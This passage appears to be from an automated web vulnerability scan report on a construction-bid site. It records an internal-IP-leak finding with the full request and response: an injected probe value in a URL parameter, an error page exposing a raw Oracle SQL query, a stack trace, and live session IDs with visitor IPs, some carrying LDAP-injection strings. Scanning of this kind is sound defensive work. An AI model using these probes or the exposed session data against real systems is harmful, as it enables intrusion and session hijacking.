dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </td> </tr> </table></body></html>
[Possible] Internal IP Address Leakage
[Possible] Internal IP Address Leakage
1
TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.
Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.
Remedy
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | 11 |
| provider | GET | 453856 |
| sortType | GET | 0 |
| jobNo | GET | ns:netsparker056650=vuln |
Extracted IP Address(es)
192.168.0.225
Request
GET /qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:34 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:34 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15184612
Content-Type: text/html;charset=utf-8
<html><head><title>Exception in IPPShowProjData.handleEnvironment()</title><script language="JavaScript"><!--//function prepare() { document.form1.title.value = document.title; document.form1.location.value = document.location; document.form1.referrer.value = document.referrer; document.form1.platform.value = navigator.appName + " " + navigator.appVersion; document.form1.message.value = document.all.details.innerText; document.form1.comments.select();}//--></script></head><body onload="prepare()"><font face="verdana,arial,helvetica,sans-serif"><hr><div align="center"><font face="verdana" size="+2"><b>Exception in IPPShowProjData.handleEnvironment()</b></font></div><hr><script language="JavaScript"><!--//document.write('Location: <font color="#FF0000">' + document.location + '</font><br>');document.write('Referrer: <font color="#FF0000">' + document.referrer + '</font><br>');document.write('Platform: <font color="#FF0000">' + navigator.appName + ' ' + navigator.appVersion + '</font><br>');//--></script></font><form name="form1" method="post" action="mailto:support@open-techsys.com?SUBJECT=Exception in IPPShowProjData.handleEnvironment()" enctype="text/plain"> <input class="button" type="button" value="Back" onclick="history.back(); return true"> <input class="button" type="button" value="Details" onclick="if (this.value == 'Details') { document.all.details.style.display=''; this.value='Hide' } else { document.all.details.style.display='none'; this.value='Details' } return true"> <div id="details" style="display:none"> <br> <font color="#FF0000">2011/03/01 14:02:34.859 [ 1] (TP-Processor1858) Exception in IPPShowProjData.handleEnvironment() from 173.193.214.243 using Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) while processing URL http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=%0D%0Ans:netsparker056650=vuln<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT COUNT(*) FROM JOBS J, JOB_TYPES JT WHERE J.JOB_NO = ns:netsparker056650=vuln AND J.JOB_TYPE_NO = JT.JOB_TYPE_NO AND JT.NAME = 'protected' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:581) at com.questcdn.projects.IPPShowProjData.handleEnvironment(IPPShowProjData.java:94) at dynamic.intraframe.handlers.BaseHandler.handle(BaseHandler.java:29) at dynamic.intraframe.handlers.Dispatcher.dispatchAction(Dispatcher.java:143) at dynamic.intraframe.engine.BaseInvocationContext.dispatchAction(BaseInvocationContext.java:1194) at dynamic.intraframe.engine.BaseApplicationContext.handleAction(BaseApplicationContext.java:934) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:843) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font><br> <br> <table width="600" border="0" cellpadding="0" cellspacing="1"> <tr><td bgcolor="#8888CC"><h3>URL</td></tr> <tr><td>http://qap.questcdn.com/qap/action/IPPshowProjData</td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Transient Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Parameter Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">group</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">11</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">jobCategoryNo</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">324403</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">jobNo</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">
ns:netsparker056650=vuln</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">provider</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">453856</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">sortType</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">0</font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Session Data</td></tr> <tr><td><b>SessionManager:</b> dynamic.intraframe.session.BaseSessionManager<br><b>Active Session Count:</b> 27201<br><b>Current Session ID:</b> <a href="?function=sessions&session=/177428174825690686">/177428174825690686</a><br><table width="100%"><tr><td bgcolor="#8888CC"><font size="2"><b>ID</b></font></td><td bgcolor="#8888CC"><font size="2"><b>IP Address</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Created</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Accessed</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Expires</b></font></td><td bgcolor="#8888CC"><font size="2"><b>User Agent</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)!(sn=*">*)!(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)(sn=*">*)(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/100032182287396464">/100032182287396464</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">87.248.122.142</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 10:47 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1000887201444992428">/1000887201444992428</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.169</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 23 11:30 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001009767694586911">/1001009767694586911</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 12:17 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001053229268131260">/1001053229268131260</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 27 02:52 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001271621786391028">/1001271621786391028</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">65.116.50.98</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 09:11 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/1; MSN Optimized;US)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001328704857911433">/1001328704857911433</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">207.171.99.1</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 11:25 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001751426128761577">/1001751426128761577</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">208.115.111.246</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 26 12:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001915922055110227">/1001915922055110227</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002073102683406456">/1002073102683406456</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">67.195.111.172</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:57 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002350286901349887">/1002350286901349887..
Date: Tue, 01 Mar 2011 20:02:34 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:34 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15184612
Content-Type: text/html;charset=utf-8
<html><head><title>Exception in IPPShowProjData.handleEnvironment()</title><script language="JavaScript"><!--//function prepare() { document.form1.title.value = document.title; document.form1.location.value = document.location; document.form1.referrer.value = document.referrer; document.form1.platform.value = navigator.appName + " " + navigator.appVersion; document.form1.message.value = document.all.details.innerText; document.form1.comments.select();}//--></script></head><body onload="prepare()"><font face="verdana,arial,helvetica,sans-serif"><hr><div align="center"><font face="verdana" size="+2"><b>Exception in IPPShowProjData.handleEnvironment()</b></font></div><hr><script language="JavaScript"><!--//document.write('Location: <font color="#FF0000">' + document.location + '</font><br>');document.write('Referrer: <font color="#FF0000">' + document.referrer + '</font><br>');document.write('Platform: <font color="#FF0000">' + navigator.appName + ' ' + navigator.appVersion + '</font><br>');//--></script></font><form name="form1" method="post" action="mailto:support@open-techsys.com?SUBJECT=Exception in IPPShowProjData.handleEnvironment()" enctype="text/plain"> <input class="button" type="button" value="Back" onclick="history.back(); return true"> <input class="button" type="button" value="Details" onclick="if (this.value == 'Details') { document.all.details.style.display=''; this.value='Hide' } else { document.all.details.style.display='none'; this.value='Details' } return true"> <div id="details" style="display:none"> <br> <font color="#FF0000">2011/03/01 14:02:34.859 [ 1] (TP-Processor1858) Exception in IPPShowProjData.handleEnvironment() from 173.193.214.243 using Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) while processing URL http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=324403&group=11&provider=453856&sortType=0&jobNo=%0D%0Ans:netsparker056650=vuln<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT COUNT(*) FROM JOBS J, JOB_TYPES JT WHERE J.JOB_NO = ns:netsparker056650=vuln AND J.JOB_TYPE_NO = JT.JOB_TYPE_NO AND JT.NAME = 'protected' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:581) at com.questcdn.projects.IPPShowProjData.handleEnvironment(IPPShowProjData.java:94) at dynamic.intraframe.handlers.BaseHandler.handle(BaseHandler.java:29) at dynamic.intraframe.handlers.Dispatcher.dispatchAction(Dispatcher.java:143) at dynamic.intraframe.engine.BaseInvocationContext.dispatchAction(BaseInvocationContext.java:1194) at dynamic.intraframe.engine.BaseApplicationContext.handleAction(BaseApplicationContext.java:934) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:843) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font><br> <br> <table width="600" border="0" cellpadding="0" cellspacing="1"> <tr><td bgcolor="#8888CC"><h3>URL</td></tr> <tr><td>http://qap.questcdn.com/qap/action/IPPshowProjData</td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Transient Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Parameter Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">group</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">11</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">jobCategoryNo</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">324403</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">jobNo</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">
ns:netsparker056650=vuln</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">provider</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">453856</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">sortType</font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1">0</font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Session Data</td></tr> <tr><td><b>SessionManager:</b> dynamic.intraframe.session.BaseSessionManager<br><b>Active Session Count:</b> 27201<br><b>Current Session ID:</b> <a href="?function=sessions&session=/177428174825690686">/177428174825690686</a><br><table width="100%"><tr><td bgcolor="#8888CC"><font size="2"><b>ID</b></font></td><td bgcolor="#8888CC"><font size="2"><b>IP Address</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Created</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Accessed</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Expires</b></font></td><td bgcolor="#8888CC"><font size="2"><b>User Agent</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)!(sn=*">*)!(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)(sn=*">*)(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/100032182287396464">/100032182287396464</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">87.248.122.142</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 10:47 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1000887201444992428">/1000887201444992428</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.169</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 23 11:30 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001009767694586911">/1001009767694586911</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 12:17 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001053229268131260">/1001053229268131260</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 27 02:52 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001271621786391028">/1001271621786391028</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">65.116.50.98</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 09:11 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/1; MSN Optimized;US)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001328704857911433">/1001328704857911433</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">207.171.99.1</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 11:25 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; 